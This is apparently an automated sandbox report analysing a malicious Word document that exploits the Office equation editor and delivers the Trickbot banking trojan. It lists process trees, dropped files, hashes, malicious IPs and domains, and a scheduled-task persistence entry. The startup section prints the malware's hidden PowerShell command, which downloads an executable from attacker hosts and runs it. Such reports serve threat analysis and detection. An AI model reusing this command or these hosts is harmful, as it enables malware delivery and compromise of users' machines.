Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001E71D1 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,18_2_001E71D1
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001E4380 GetUserNameW,18_2_001E4380
Contains functionality to query windows versionShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001EEDA0 GetVersion,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,18_2_001EEDA0
Queries the cryptographic machine GUIDShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 565263 Sample: FORMP16T.docx Startdate: 25/05/2018 Architecture: WINDOWS Score: 100 67 Contains an external reference to another document 2->67 69 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->69 71 Detected Trickbot e-Banking trojan config 2->71 73 9 other signatures 2->73 11 EQNEDT32.EXE 47 2->11         started        14 taskeng.exe 1 2->14         started        16 WINWORD.EXE 355 67 2->16         started        process3 dnsIp4 89 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->89 20 cmd.exe 11->20         started        23 ounehcnaykuM.exe 2 14->23         started        55 cypruscars4u.com 87.247.241.143, 49188, 49189, 49190 GOSIS-ASFR United Kingdom 16->55 57 figs4u.co.uk 16->57 59 ipinfo.io 16->59 47 C:\Users\user~1\AppData\Local\Temp\task.bat, ASCII 16->47 dropped 91 Document exploit detected (creates forbidden files) 16->91 25 FLTLDR.EXE 16->25         started        file5 signatures6 process7 signatures8 79 Suspicious powershell command line found 20->79 81 Powershell starts a process from the temp directory 20->81 83 Tries to download and execute files (via powershell) 20->83 27 powershell.exe 12 7 20->27         started        85 Modifies the context of a thread in another process (thread injection) 23->85 87 Injects a PE file into a foreign processes 23->87 31 ounehcnaykuM.exe 4 23->31         started        process9 dnsIp10 51 C:\Users\user\AppData\...\ounehcnaykuL.exe, PE32 27->51 dropped 97 System process connects to network (likely due to code injection or exploit) 27->97 99 Powershell connects to network 27->99 101 Powershell drops PE file 27->101 34 ounehcnaykuL.exe 2 27->34         started        61 82.202.221.37, 447, 49197 SELECTELRU Russian Federation 31->61 63 92.55.251.211, 449, 49195 FONE-ASNPL Poland 31->63 65 ipinfo.io 216.239.34.21, 49194, 80 GOOGLE-GoogleIncUS United States 31->65 53 C:\Users\user\AppData\...\systeminfo32, data 31->53 dropped 103 Detected Trickbot Trojan 31->103 105 Installs new ROOT certificates 31->105 107 Writes to foreign memory regions 31->107 111 2 other signatures 31->111 37 svchost.exe 31->37         started        file11 109 Detected TCP or UDP traffic on non-standard ports 63->109 signatures12 process13 signatures14 75 Modifies the context of a thread in another process (thread injection) 34->75 77 Injects a PE file into a foreign processes 34->77 39 ounehcnaykuL.exe 2 34->39         started        process15 file16 49 C:\Users\user\AppData\...\ounehcnaykuM.exe, PE32 39->49 dropped 42 ounehcnaykuM.exe 2 39->42         started        process17 signatures18 93 Modifies the context of a thread in another process (thread injection) 42->93 95 Injects a PE file into a foreign processes 42->95 45 ounehcnaykuM.exe 2 42->45         started        process19

Simulations

Behavior and APIs

TimeTypeDescription
16:03:25API Interceptor1116x Sleep call for process: WINWORD.EXE modified
16:03:39API Interceptor1x Sleep call for process: FLTLDR.EXE modified
16:03:39API Interceptor5x Sleep call for process: EQNEDT32.EXE modified
16:03:43API Interceptor1x Sleep call for process: powershell.exe modified
16:05:26API Interceptor2x Sleep call for process: ounehcnaykuL.exe modified
16:06:24API Interceptor4x Sleep call for process: ounehcnaykuM.exe modified
16:06:41Task SchedulerRun new task: MsSysToken path: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
16:07:00API Interceptor3x Sleep call for process: taskeng.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
92.55.251.211http://misionpsicologica.com/outurg.binmaliciousBrowse
    87.247.241.143http://figs4u.co.uk/logo.binmaliciousBrowse
    • figs4u.co.uk/logo.bin
    FORMP16T.docxa372be88a44c8e4fce021a0eba614b3624fa6357c9aab397e0b4cda58f7fd2c3maliciousBrowse
    • figs4u.co.uk/logo.bin

    Domains

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    figs4u.co.ukhttp://figs4u.co.uk/logo.binmaliciousBrowse
    • 87.247.241.143
    cypruscars4u.comFORMP16T.docxa372be88a44c8e4fce021a0eba614b3624fa6357c9aab397e0b4cda58f7fd2c3maliciousBrowse
    • 87.247.241.143

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    GOSIS-ASFRhttp://figs4u.co.uk/logo.binmaliciousBrowse
    • 87.247.241.143
    FORMP16T.docxa372be88a44c8e4fce021a0eba614b3624fa6357c9aab397e0b4cda58f7fd2c3maliciousBrowse
    • 87.247.241.143
    FONE-ASNPLhttp://misionpsicologica.com/outurg.binmaliciousBrowse
    • 92.55.251.211
    SELECTELRU37Faktura_VAT_902675109.jsfbe473e2f716f588438ec7a9e27e9afaed32106ffa55681ff3107a09af83c057maliciousBrowse
    • 95.213.235.66
    http://luxurytds.com/go.php?sid=1maliciousBrowse
    • 95.213.144.13
    http://galereya-mebel.ru/Question/maliciousBrowse
    • 37.200.67.211
    hmrc_19060418.docfc459f40f136222187bb26aba98703dd717469b31c9e9feb16fd9dad9ab7fb3cmaliciousBrowse
    • 78.155.206.228
    http://holadentistausa.com/?4A=G0GNYTNYDyi-GSGI3LUwmaliciousBrowse
    • 95.213.191.128
    hfijeqr494jt891.exe4a2f614f791be7732f3c44497f46c84aebac2199cc043cd3825462f73b8689camaliciousBrowse
    • 82.202.238.204
    http://107.181.187.61/hfijeqr494jt891.exemaliciousBrowse
    • 82.202.238.204
    Invoice INV0000699.vbsf852c4047dfb6d3c243d0474740f4fbd8cc753680d55e42d07ab485da3c59462maliciousBrowse
    • 82.202.236.5
    23515_155123.doc7157e139fa9e8f1394319742a2f665965e939299217586e51d4c207a4048d7cfmaliciousBrowse
    • 95.213.204.162
    http://bbsmoke.com?FE7JoX=dcairns@bchousing.orgmaliciousBrowse
    • 92.53.77.216
    Faktura_VAT_21357185806.js5d757af6d0c3f3af0ae8d0b54dcacf7199f83523d6a74f2d8cfc32d34e143ba7maliciousBrowse
    • 92.53.77.188
    18-02-22-(k-irie).xlsf29afa4665c7d226d093d083a72431237b76c9dbb10bf531c3eaa56090ecf277maliciousBrowse
    • 92.53.78.250
    http://florida-pawn.com?2XqED=PQTOTGGO3DTyCqGz2IEGFS3LUwmaliciousBrowse
    • 95.213.200.176
    IMG-20180404-8FBE1F.vbs8b4b4e93c927bf9d107965b904ecfe22e4c66a12a739f16fba95f8853502d394maliciousBrowse
    • 78.155.218.104
    qZPpNAHaPq.exef196a0f81410bc21b3fa15c12f35a490a96d99b9b1f57943b5dee4f0aef0347fmaliciousBrowse
    • 78.155.218.104
    http://92.53.77.217/toler.pngmaliciousBrowse
    • 92.53.77.217
    536ffa992-491508d-ca0354e-52f32a3-7a679a53a.docd5f72d16015ba479d1200f68515efb1602622b3b1bcab6dbda633e63caca82eemaliciousBrowse
    • 80.93.182.178
    http://92.53.77.217/toler.pngmaliciousBrowse
    • 92.53.77.217
    http://misionpsicologica.com/outurg.binmaliciousBrowse
    • 92.53.77.219
    Jgm1omfumn.doc6fbf7c2ba517468f2a2a80d80c2ae220fed9ec31c272dd1948dfd6c3f5aed14bmaliciousBrowse
    • 92.53.66.115

    Dropped Files

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exehttp://figs4u.co.uk/logo.binmaliciousBrowse
      log.exe492aaf70e95987373a3c01f6afa10c9f064d756871d6b02d7f65e03e70e92ac9maliciousBrowse
        FORMP16T.docxa372be88a44c8e4fce021a0eba614b3624fa6357c9aab397e0b4cda58f7fd2c3maliciousBrowse
          C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exehttp://figs4u.co.uk/logo.binmaliciousBrowse
            log.exe492aaf70e95987373a3c01f6afa10c9f064d756871d6b02d7f65e03e70e92ac9maliciousBrowse
              FORMP16T.docxa372be88a44c8e4fce021a0eba614b3624fa6357c9aab397e0b4cda58f7fd2c3maliciousBrowse

                Screenshots

                windows-stand

                Startup

                • System is w7_1
                • WINWORD.EXE (PID: 3580 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\FORMP16T.docx MD5: 5D798FF0BE2A8970D932568068ACFD9D)
                  • FLTLDR.EXE (PID: 3852 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\JPEGIM32.FLT MD5: 92E7D4655C629754D2366E67E68A32F9)
                • EQNEDT32.EXE (PID: 3888 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
                  • cmd.exe (PID: 3912 cmdline: CmD /C %tmp%\task.bat & UUUUUUUU c MD5: AD7B9C14083B52BC532FBA5948342B98)
                    • powershell.exe (PID: 3968 cmdline: PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}'' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
                      • ounehcnaykuL.exe (PID: 236 cmdline: 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe' MD5: A5EB363D44116B6CECB2AA7527FD7A6A)
                        • ounehcnaykuL.exe (PID: 2780 cmdline: 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe' MD5: A5EB363D44116B6CECB2AA7527FD7A6A)
                          • ounehcnaykuM.exe (PID: 2760 cmdline: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe MD5: A5EB363D44116B6CECB2AA7527FD7A6A)
                            • ounehcnaykuM.exe (PID: 2992 cmdline: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe MD5: A5EB363D44116B6CECB2AA7527FD7A6A)
                • taskeng.exe (PID: 2068 cmdline: taskeng.exe {4FF6B578-0DC8-43D6-96ED-9BD735AC3890} S-1-5-18:NT AUTHORITY\System:Service: MD5: 4F2659160AFCCA990305816946F69407)
                  • ounehcnaykuM.exe (PID: 2532 cmdline: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe MD5: A5EB363D44116B6CECB2AA7527FD7A6A)
                    • ounehcnaykuM.exe (PID: 3060 cmdline: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe MD5: A5EB363D44116B6CECB2AA7527FD7A6A)
                      • svchost.exe (PID: 3144 cmdline: svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
                • cleanup

                Created / dropped Files

                C:\Users\user~1\AppData\Local\Temp\OICE_BD2C3A33-BC6C-4098-A16D-51A8AA25C09C.0\FLEA0B.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):174
                Entropy (8bit):0.05104301664669757
                Encrypted:false
                MD5:6B028CF0BFE7A0B8AF8F93C6028BCE58
                SHA1:8FBF35AD31CE4EC369F27FC7C14D5F6A04340718
                SHA-256:FC5335043C66934CF20380C547D3D68E62328B6436DC74A8BC786C3FE6765C45
                SHA-512:611844DE0D4244982C0F2BFA8A12E25768AD9C0EDAFCDE7028B1242846DD1EEB720FDE14A52F299122C814EA622F5C2634B43AD81A2F66A914E50E3A3A4C4AD3
                Malicious:false
                Reputation:moderate, very likely benign file
                C:\Users\user~1\AppData\Local\Temp\VB8E64.tmp
                Process:C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe
                File Type:CDF V2 Document, corrupt: Cannot read summary info
                Size (bytes):32768
                Entropy (8bit):7.103203419688449
                Encrypted:false
                MD5:B8AFD98281FF1377DA72ACF8E8FB09A0
                SHA1:E08D2C5659A68BA73E727EFE4DED3FCE59A249E2
                SHA-256:CC68ED6421653E63A8196F8D4BD9F45D0EF478E658578756A55E49F35ECB20C2
                SHA-512:58781843D1E0322BA12A3AA5786EF4936CE5CD4BD1D25BF32D91E223D5FF228DDBFE5A6840940B51B328F4E8788DB461E8F9CF50FF6F74D3B2E1E338271BD2FC
                Malicious:false
                Reputation:low
                C:\Users\user~1\AppData\Local\Temp\VBA869.tmp
                Process:C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe
                File Type:CDF V2 Document, corrupt: Cannot read summary info
                Size (bytes):32768
                Entropy (8bit):7.103203419688449
                Encrypted:false
                MD5:B8AFD98281FF1377DA72ACF8E8FB09A0
                SHA1:E08D2C5659A68BA73E727EFE4DED3FCE59A249E2
                SHA-256:CC68ED6421653E63A8196F8D4BD9F45D0EF478E658578756A55E49F35ECB20C2
                SHA-512:58781843D1E0322BA12A3AA5786EF4936CE5CD4BD1D25BF32D91E223D5FF228DDBFE5A6840940B51B328F4E8788DB461E8F9CF50FF6F74D3B2E1E338271BD2FC
                Malicious:false
                Reputation:low
                C:\Users\user~1\AppData\Local\Temp\task (2).bat
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with CRLF line terminators
                Size (bytes):301
                Entropy (8bit):5.341529258263059
                Encrypted:false
                MD5:0ED596178C1E90DACC15EA914F1251BF
                SHA1:872B0CE3496EEAF0324D507FA93DB36DA73789C7
                SHA-256:3CF5B0EDBA9049C9A4F737AFE5326B9D95A40DD08E884F419449F03D691657B5
                SHA-512:29C920A518CC0A84C9B7DC4844793101DD07B5ED7351370FD42C334591EECC2BB81DF3E7C97857F7B61C130FFE4484F982B9642CDB7A6D27BFB539D299B19E16
                Malicious:false
                Reputation:low
                C:\Users\user~1\AppData\Local\Temp\task (2).bat:Zone.Identifier
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with CRLF line terminators
                Size (bytes):26
                Entropy (8bit):3.9500637564362093
                Encrypted:false
                MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                Malicious:false
                Reputation:moderate, very likely benign file
                C:\Users\user~1\AppData\Local\Temp\task.bat
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with no line terminators
                Size (bytes):26
                Entropy (8bit):4.132944044980959
                Encrypted:false
                MD5:29575D4466CB36D6C83661353B942D0E
                SHA1:043CDBBC3A0F7BEA4D874B6CA42C05B9771974E9
                SHA-256:EB97B10E0C3B2F3772EE157895CE8D6CD41536C4E4D32075CB5CCDF77CB63B2E
                SHA-512:9ACD8D9DF5275202C28D25DDD662405AE2C014EBA50464CA792798A0BB86C018F142B4D37155238DB599B00A235E3C4DA5D0B3F9EE21A8F70CD7090B6F3E279C
                Malicious:true
                Reputation:low
                C:\Users\user~1\AppData\Local\Temp\task.bat:Zone.Identifier
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with CRLF line terminators
                Size (bytes):26
                Entropy (8bit):3.9500637564362093
                Encrypted:false
                MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                Malicious:false
                Reputation:moderate, very likely benign file
                C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):144008
                Entropy (8bit):0.309121630519899
                Encrypted:false
                MD5:111690C77F5DB042C8CF8F7F7076B4C6
                SHA1:78E53AFA22BD1D94D0104F1AC8BA5F7179B4A181
                SHA-256:28939E88514E5E5026C1F03AC6D6371DA01367A2BD38EE8464991D2D5A44BAEA
                SHA-512:5A0DEC41F42E559B160608D916B29593ADFBF0C79087435B0595FF3236F9798BC3B1CDBFB0E2BA14AB1CC0F04C733F15E1083D5913E883E018A6AC51F345D5E3
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{CBE9BB57-A9E4-470C-BCA7-2AEF58493600}.FSD
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):156816
                Entropy (8bit):0.6688423919119079
                Encrypted:false
                MD5:E6A04AE888BB33C1B3AD233341797EEB
                SHA1:9D085FC8F81DA0C9E2A480BC9DAA9FCB9FC5967C
                SHA-256:46F9E61E5068D17CBDC28DA823B4C09F0E00F11E3280DD42914C94F341FE2C9A
                SHA-512:57794440B0EF0CCA39BD366016AE6A211136492568F092FD059CFD7CB802070137DFA37C687E11D32FB15885C0FBD1425C1A7DBB6AC54C929C37D28D5F9B0117
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):133
                Entropy (8bit):4.290418221017282
                Encrypted:false
                MD5:A45BEA3F06257DBDCDB990D1B00548B4
                SHA1:90EB28F87B40F3098A169AAB1B0F429C19745F64
                SHA-256:26657AE5359C6DF278F1DDC2B3D9D1801AD76F1C72EC46154E1D021DE7636646
                SHA-512:706A8E5FC73C46FC3DA8313FABD7204468B27D07637F0162DA5D37BD31208A173561F7DF76651E98347BDB251EDB8313BB3D72A37923AAEBD682815EC3BA5705
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):144008
                Entropy (8bit):0.30905322545035546
                Encrypted:false
                MD5:9C225A938234CF393BECD8FCF86A1B3E
                SHA1:5CCC40E19CDB25D70C8886D4BC0C9B21A59F50A6
                SHA-256:053869098DBAF024938E250C4101303C99151CFEF6D448AE22AFDCE5854CA4CA
                SHA-512:F096432D6923727047FCD5DE6499FBDC8E5B2A5085F28BA4D7D67E9DE129843830A000DBFD4138AC4A8A072AD16C6D89E090ABF2A4678E33C27ADFB3B48C167B
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{19FDB563-7705-49FB-BDD1-833A23D919A4}.FSD
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):149973
                Entropy (8bit):0.2771501901260465
                Encrypted:false
                MD5:C23B876E1ABC55E51DB746C071C9E434
                SHA1:2815409687B347B6C8738114670B3CA8149C1700
                SHA-256:4C49102D7174AF2365EA4DF93D83D9489E6D1D7BDEC4B48F1DB54E29CEE41EC1
                SHA-512:8A5FFDAB46C28EA20B59FFEAA9975DED123E4F9F75E3EF648BF1D935B8023D4C7505592EF94F4A1849C3E147CB3326D6DC0FCEB64F541A08F746970F542CD5B8
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):133
                Entropy (8bit):4.237933634616183
                Encrypted:false
                MD5:1DFC4AE3E16EEB07977EB4C0D567E47D
                SHA1:1D4FAEFCD66002A8562F421E09F116C0638F1B0A
                SHA-256:2534A8DFF264592949A7EFDCC128B6334462741A41D690804BF9E920474B42B9
                SHA-512:0E86AD8B341D39CF8346E9AF165F8B0838A68E3A35D2FBB1C36484D84E61A70EC08FE3915DDD82D23E701D8D22BA8F969EC9A35A702E46A62FF5F8DD5AD247D9
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKPPFFPF\logo[1].jpg
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Rich Text Format data, version 1, unknown character set
                Size (bytes):55287
                Entropy (8bit):6.271675216973692
                Encrypted:false
                MD5:5EA7F41B618122A1A166D32988B4D51C
                SHA1:EA994D5FBB7C198ACCDBC36A980812B7A554520A
                SHA-256:359C7D670D00D1CE72C51106886768A84D37CD3EB8463015A35D01936B00A184
                SHA-512:1AAD263BDFC928B684EEDACCE50A8B4F0109EC979E9B68DBADE59CC39B859C6565297BD51F74ADCC9A237BE44A0F380397AC4CC88336A0A532D0855B26A23DB6
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CD83BA5.jpeg
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:JPEG image data, JFIF standard 1.01
                Size (bytes):15314
                Entropy (8bit):7.752500807971687
                Encrypted:false
                MD5:0AA7E0CEAC46B4FA8DD761CA6B410AF2
                SHA1:9A199C2B10767F738FBE51E78BE35D05250E223D
                SHA-256:1F2CCF4F8DF0644BD62DF930437BD76B1AD95F7359F06A6D3E0C9192550DECD2
                SHA-512:D88205CBEB4C9D25CB374A327EE90DAF494FDCADCA9166218D9F32931B35BF69734BEBB2497BB789EEE3706FECEF8B93EE66F55B43241321F074677C83055862
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\831CC83F.jpg
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):174
                Entropy (8bit):0.05104301664669757
                Encrypted:false
                MD5:6B028CF0BFE7A0B8AF8F93C6028BCE58
                SHA1:8FBF35AD31CE4EC369F27FC7C14D5F6A04340718
                SHA-256:FC5335043C66934CF20380C547D3D68E62328B6436DC74A8BC786C3FE6765C45
                SHA-512:611844DE0D4244982C0F2BFA8A12E25768AD9C0EDAFCDE7028B1242846DD1EEB720FDE14A52F299122C814EA622F5C2634B43AD81A2F66A914E50E3A3A4C4AD3
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\843B67B6.jpg
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Rich Text Format data, version 1, unknown character set
                Size (bytes):55287
                Entropy (8bit):6.271675216973692
                Encrypted:false
                MD5:5EA7F41B618122A1A166D32988B4D51C
                SHA1:EA994D5FBB7C198ACCDBC36A980812B7A554520A
                SHA-256:359C7D670D00D1CE72C51106886768A84D37CD3EB8463015A35D01936B00A184
                SHA-512:1AAD263BDFC928B684EEDACCE50A8B4F0109EC979E9B68DBADE59CC39B859C6565297BD51F74ADCC9A237BE44A0F380397AC4CC88336A0A532D0855B26A23DB6
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE664534.jpeg
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:JPEG image data, JFIF standard 1.01
                Size (bytes):15314
                Entropy (8bit):7.752500807971687
                Encrypted:false
                MD5:0AA7E0CEAC46B4FA8DD761CA6B410AF2
                SHA1:9A199C2B10767F738FBE51E78BE35D05250E223D
